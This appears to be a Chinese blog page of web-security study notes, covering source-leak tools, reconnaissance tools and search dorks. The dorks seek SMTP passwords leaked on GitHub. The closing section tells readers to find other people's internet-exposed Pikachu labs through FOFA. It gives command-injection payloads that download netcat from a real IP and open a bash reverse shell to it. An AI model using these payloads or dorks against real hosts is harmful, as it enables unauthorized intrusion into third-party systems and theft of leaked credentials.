备份：敏感目录文件扫描-7kbscan-WebPathBrute CVs:<a target="_blank" rel="noopener" href="https://github.com/kost/dvcs-ripper">https://github.com/kost/dvcs-ripper</a> GIT:<a target="_blank" rel="noopener" href="https://github.com/lijiejie/GitHack">https://github.com/lijiejie/GitHack</a><br />
SVN:<a target="_blank" rel="noopener" href="https://github.com/callmefeifei/SvnHack">https://github.com/callmefeifei/SvnHack</a><br />
DS Store:<a target="_blank" rel="noopener" href="https://github.com/lijiejie/ds_store_exp">https://github.com/lijiejie/ds_store_exp</a></p>
<p>GTTHUB资源搜索：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">n:name test				# 仓库标题搜索含有关键字</span><br><span class="line">in:descripton test		# 仓库描述搜索含有关键字</span><br><span class="line">in:readme test 			# Readme文件搜素含有关键字</span><br><span class="line">stars:&gt;3000 test		# stars数量大于3000的搜索关键字</span><br><span class="line">...</span><br><span class="line"># 关键字配合谷歌搜索：</span><br><span class="line">site:Github.com smtp</span><br><span class="line">site:Github.com smtp @qq.com</span><br><span class="line">site:Github.com smtp @126.com</span><br><span class="line">site:Github.com smtp @163.com</span><br><span class="line">site:Github.com smtp @sina.com.cn</span><br><span class="line">site:Github.com smtp password</span><br><span class="line">site:Github.com String password smtp</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="http://www.h0r2yc.com/1.zip">www.h0r2yc.com/1.zip</a></p>
</li>
</ul>
<h4 id="d-web域名-子域名相似域名反查域名旁注等"><a class="markdownIt-Anchor" href="#d-web域名-子域名相似域名反查域名旁注等"></a> d. Web域名-子域名&amp;相似域名&amp;反查域名&amp;旁注等</h4>
<ul>
<li>
<p>多个域名</p>
<p>用域名查询来查类似的域名，相似的可能有注册信息</p>
<p>相似域名查询：<a target="_blank" rel="noopener" href="https://wanwang.aliyun.com/domain/searchresult/">https://wanwang.aliyun.com/domain/searchresult/</a></p>
<p>备案查询：<a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/#/Integrated/index">https://beian.miit.gov.cn/#/Integrated/index</a></p>
</li>
</ul>
<h3 id="3-信息打点-系统"><a class="markdownIt-Anchor" href="#3-信息打点-系统"></a> 3. 信息打点-系统</h3>
<ul>
<li>
<p>获取网络服务信息 - 服务厂商 &amp; 网络架构</p>
<p>通过域名查询ip地址所属：<a target="_blank" rel="noopener" href="https://site.ip138.com/">https://site.ip138.com/</a></p>
</li>
<li>
<p>获取服务信息 - 应用协议 &amp; 内网资产</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#相关利用项目：</span><br><span class="line">Masscan:https://github.com/robertdavidgraham/masscan Wafw00f:https://github.com/EnableSecurity/wafw00f</span><br><span class="line">Kali上自带Nmap，Masscan，lbd等项目，超级ping:ping.chinaz.com </span><br><span class="line"></span><br><span class="line">超级ping：CDN服务识别</span><br><span class="line">Masscan：端口扫描，应用协议</span><br><span class="line">Wafw00f：Web应用防护防火墙识别</span><br><span class="line">Nmap：端口扫描，应用协议，防火墙识别</span><br><span class="line">lbd：负载均衡，广域网负载均衡，应用层负载均衡</span><br><span class="line"></span><br><span class="line">#端口协议安全：</span><br><span class="line">https://www.se7enseC.cn/2018/11/28/%E7%AB%AF%E5%8F%A3%E6%B8%97%E9% 80%8FE680BBE78BB93/</span><br></pre></td></tr></table></figure>
</li>
<li>
<p>获取阻碍信息 - CDN &amp; WAF &amp; 负载 &amp; 防火墙</p>
</li>
</ul>
<h2 id="在线靶场"><a class="markdownIt-Anchor" href="#在线靶场"></a> 在线靶场</h2>
<p><strong>FOFA</strong> （ <a target="_blank" rel="noopener" href="http://fofa.so">fofa.so</a>）是国内著名的网络空间测绘搜索引擎</p>
<p><strong>Pikachu</strong> 是一个专门用来练习网络安全技能的<strong>漏洞测试靶场</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 搜索中国大陆和港澳台的 pikachu 靶场</span><br><span class="line">&quot;pikachu&quot; &amp;&amp; country=&quot;CN&quot; &amp;&amp; title==&quot;Get the pikachu&quot;</span><br><span class="line"></span><br><span class="line"># 挨个尝试，看哪个靶场能执行命令</span><br><span class="line"># RCE 里的 Ping，输入 127.0.0.1 看看是否有返回</span><br><span class="line"></span><br><span class="line"># 对靶场</span><br><span class="line">127.0.0.1 &amp; curl -v -m 5 http://8.133.245.52/nc -o /tmp/n 2&gt;&amp;1 # 8000可能被靶场防火墙拦截</span><br><span class="line">127.0.0.1 &amp; chmod +x /tmp/n</span><br><span class="line">127.0.0.1 &amp; /tmp/n -h</span><br><span class="line">127.0.0.1 &amp; bash -c &#x27;bash -i &gt;&amp; /dev/tcp/8.133.245.52/5577 0&gt;&amp;1&#x27;</span><br></pre></td></tr></table></figure>
<p>![image-20260825160246628](…/…/…/…/Library/Application Support/typora-user-images/image-20260825160246628.png)</p>

  </div>
</article>
</div>



          
            <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text"> 基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%8F%8D%E5%BC%B9shell-%E8%A7%A3%E5%86%B3%E6%95%B0%E6%8D%AE%E5%9B%9E%E6%98%BE%E5%92%8C%E4%BA%A4%E4%BA%92%E5%BC%8F%E5%9B%9E%E6%98%BE-%E6%95%B0%E6%8D%AE%E9%80%9A%E4%BF%A1%E9%97%AE%E9%A2%98"><span class="toc-number">1.1.</span> <span class="toc-text"> 1. 反弹shell-解决数据回显和交互式回显、数据通信问题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-web-%E5%BA%94%E7%94%A8"><span class="toc-number">1.2.</span> <span class="toc-text"> 2. Web 应用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9-web%E6%9E%B6%E6%9E%84"><span class="toc-number">1.3.</span> <span class="toc-text"> 3. 信息打点-Web架构</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#a-web%E6%9E%B6%E6%9E%84-%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%AD%89"><span class="toc-number">1.3.1.</span> <span class="toc-text"> a. Web架构-语言&amp;中间件&amp;数据库&amp;系统等</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#b-web%E6%BA%90%E7%A0%81-cms%E5%BC%80%E6%BA%90%E9%97%AD%E6%BA%90%E5%94%AE%E5%8D%96%E8%87%AA%E4%B8%BB%E7%A0%94%E5%8F%91%E7%AD%89"><span class="toc-number">1.3.2.</span> <span class="toc-text"> b. Web源码-CMS开源&amp;闭源售卖&amp;自主研发等</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#c-web%E6%BA%90%E7%A0%81%E8%8E%B7%E5%8F%96-%E6%B3%84%E9%9C%B2%E5%AE%89%E5%85%A8%E8%B5%84%E6%BA%90%E7%9B%91%E6%8E%A7%E5%85%B6%E4%BB%96%E7%AD%89"><span class="toc-number">1.3.3.</span> <span class="toc-text"> c. Web源码获取-泄露安全&amp;资源监控&amp;其他等</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#d-web%E5%9F%9F%E5%90%8D-%E5%AD%90%E5%9F%9F%E5%90%8D%E7%9B%B8%E4%BC%BC%E5%9F%9F%E5%90%8D%E5%8F%8D%E6%9F%A5%E5%9F%9F%E5%90%8D%E6%97%81%E6%B3%A8%E7%AD%89"><span class="toc-number">1.3.4.</span> <span class="toc-text"> d. Web域名-子域名&amp;相似域名&amp;反查域名&amp;旁注等</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9-%E7%B3%BB%E7%BB%9F"><span class="toc-number">1.4.</span> <span class="toc-text"> 3. 信息打点-系统</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9C%A8%E7%BA%BF%E9%9D%B6%E5%9C%BA"><span class="toc-number">2.</span> <span class="toc-text"> 在线靶场</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&text=网络安全学习笔记（小迪）"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&is_video=false&description=网络安全学习笔记（小迪）"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=网络安全学习笔记（小迪）&body=Check out this article: https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&title=网络安全学习笔记（小迪）"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&name=网络安全学习笔记（小迪）&description=https://www.cnblogs.com/sunny11/p/13583083.html"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://lifan-chen.github.io/2026/09/10/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/&t=网络安全学习笔记（小迪）"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

          
        </main>
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023-present
    Zoe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>



  
<script src="/js/nav_search.js"></script>


<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


<script src="/double-exposure/switcher.js?v=b8f9b4faeeae" defer data-double-exposure-runtime></script></body>
</html>
